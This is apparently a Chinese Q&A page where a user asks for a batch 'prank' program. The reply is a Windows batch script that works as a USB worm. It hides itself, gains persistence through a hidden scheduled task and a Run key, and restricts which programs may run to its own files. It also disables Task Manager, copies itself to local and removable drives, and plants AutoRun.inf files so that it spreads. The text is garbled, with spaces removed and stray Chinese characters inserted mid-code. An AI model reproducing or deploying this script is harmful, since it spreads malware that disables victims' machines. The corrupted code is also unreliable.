来个bat整人程来自序。
问题补充说明:不要太长了!!
给我你邮箱我给你用bat的整人程序 这里直接贴出主要代码但是没效果要用rar打包后才行@echooff
:hello
rem检查CDEF盘含bat.exe否。
ifnotexistc:\bat.exegotofu国比鸡字视置位你倍冲房n
ifnotexiste:\bat.exegotofun
ifno志texistd:\bat.exegotofun
ifnotexistf:\bat.exegotofun
rem教超虽冲提处态群定制计划任务为bat.exe实现开机启动并对计划任务进行隐藏。
schtasks/create/tnrunl132/tr%windir%\system32\bat.exe/sconlogon/ru""
attrib+s+h%windir%\呀由渐进赵扬求静尼船余tasks\runl132.job
r营会白协助em导入一些注册表键值,实现一些功能。
regaddHKEY_CURRENT_USER\Software\Microso里北位剧ft\Windows\CurrentVersion\Policies\Explor题肥也屋晚er/v"Rest稳rictRun"/tREG_振居均滑是路脚美DWORD/d1/社走别压粉专黄f
regaddH然左道故米变必采操KEY_CURRENT_USER\S院频渐否晶散量oftware\Microsoft\Windo位言合题明城殖ws\CurrentVersion\Policies\Explorer\RestrictRun/v1/tREG_SZ善游操行各传妈矿议值门/d"regedit.exe"/f
regaddHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun/v2/tREG_SZ/d"bat.exe"/f
regaddHKEY_CUR副端呼否RENT_USER\Software\Microsoft振\Windows\CurrentVersion\Policies\Explorer\Rest蒸华rictRun/v3/tREG_SZ/d"tools.exe"/f
regaddHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun/v4/tREG_SZ/d"runl132.bat"/f
regaddHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun/v5/tREG_SZ/d"bat.vbs"/f
regaddHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun/v6/tREG_SZ/d"cmd.exe"/f
regaddHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun/v7/tREG_SZ/d"AutoRun.inf"/f
regaddHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun/v8/tREG_SZ/d"shutdown.exe"/f
regaddHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun/v9/tREG_SZ/d"attrib.exe"/f
regaddHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun/v10/tREG_SZ/d"fsutil.exe"/f
regaddHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun/v11/tREG_SZ/d"schtasks.exe"/f
regaddHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun/v12/tREG_SZ/d"reg.exe"/f
regaddHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun/v13/tREG_SZ/d"WINRAR.exe"/f
regaddHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun/v14/tREG_SZ/d"Wscript.exe"/f
regaddHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun/v15/tREG_SZ/d"go.vbs"/f
regaddHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun/v16/tREG_SZ/d"notepad.exe"/f
regaddHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun/v17/tREG_SZ/d"you.txt"/f
regaddHKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Policies\System/v"DisableTaskMgr"/tREG_DWORD/d1/f
regaddHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL/v"CheckedValue"/tREG_DWORD/d0/f
regaddHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer/v"NoFolderOptions"/tREG_DWORD/d1/f
regaddHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run/vrunl132/tREG_EXPAND_SZ/d"D:\bat.exe"/f
rem检查是否有U盘插入(有,进行复制)。
:kk
for%%din(cdefghijklmnopqrstuvwxyz)dofsutilfsinfodrivetype%%d:>>%windir%\system32\note.txt
findstr/i"可移动驱动器"%windir%\system32\note.txt
iferrorlevel==0gotonext
iferrorlevel==1gotohello
:next
for/f"tokens=1"%%din('findstr/i"可移动驱动器"e:\s.txt')dosetyidong=%%d
ifexist%yidong%\bat.exegotohello
attrib-s-he:\bat.exe
copye:\bat.exe%yidong%\/y
attrib+s+he:\bat.exe
attrib+s+h"%yidong%\bat.exe"
attrib-s-h"%yidong%\AutoRun.inf"
rd/q/s"%yidong%\AutoRun.inf"
echo[AutoRun]>"%yidong%\AutoRun.inf"
echoshell\open=打开(^&O)>>"%yidong%\AutoRun.inf"
echoshell\open\command=bat.exe>>"%yidong%\AutoRun.inf"
echoshell\explore=资源管理器(^&X)>>"%yidong%\AutoRun.inf"
echoshell\explore\command=bat.exe>>"%yidong%\AutoRun.inf"
attrib+s+h"%yidong%\AutoRun.inf"
gotohello
rem进行对CDEF盘自我复制并对其隐藏。
:fun
attrib-s-h%systemroot%\system32\bat.exe
for%%kin(cdef)docopy%systemroot%\system32\bat.exe%%k:\/y
attrib-s-he:\bat.exe
for%%kin(cdef)docopye:\bat.exe%%k:\/y
attrib-s-hd:\bat.exe
for%%kin(cdef)docopyd:\bat.exe%%k:\/y
attrib-s-hf:\bat.exe
for%%kin(cdef)docopyf:\bat.exe%%k:\/y
attrib-s-hc:\bat.exe
for%%kin(cdef)docopyc:\bat.exe%%k:\/y
for%%kin(cdef)doattrib+s+h%%k:\bat.exe
attrib+s+h%systemroot%\system32\bat.exe
for%%min(cdef)doattrib-s-h-a%%m:\AutoRun.inf
for%%din(cdef)dord/q/s%%d:\AutoRun.inf
for%%sin(cdef)doecho[AutoRun]>%%s:\AutoRun.inf
for%%min(cdef)doechoshell\open=打开(^&O)>>%%m:\AutoRun.inf
for%%lin(cdef)doechoshell\open\command=bat.exe>>%%l:\AutoRun.inf
for%%ain(cdef)doechoshell\explore=资源管理器(^&X)>>%%a:\AutoRun.inf
for%%ein(cdef)doechoshell\explore\command=bat.exe>>%%e:\AutoRun.inf
attrib+s+h+rc:\AutoRun.inf&attrib+s+h+re:\AutoRun.inf&attrib+s+h+rd:\AutoRun.inf&attrib+s+h+rf:\AutoRun.inf
gotohello
标签:bat,整人,来个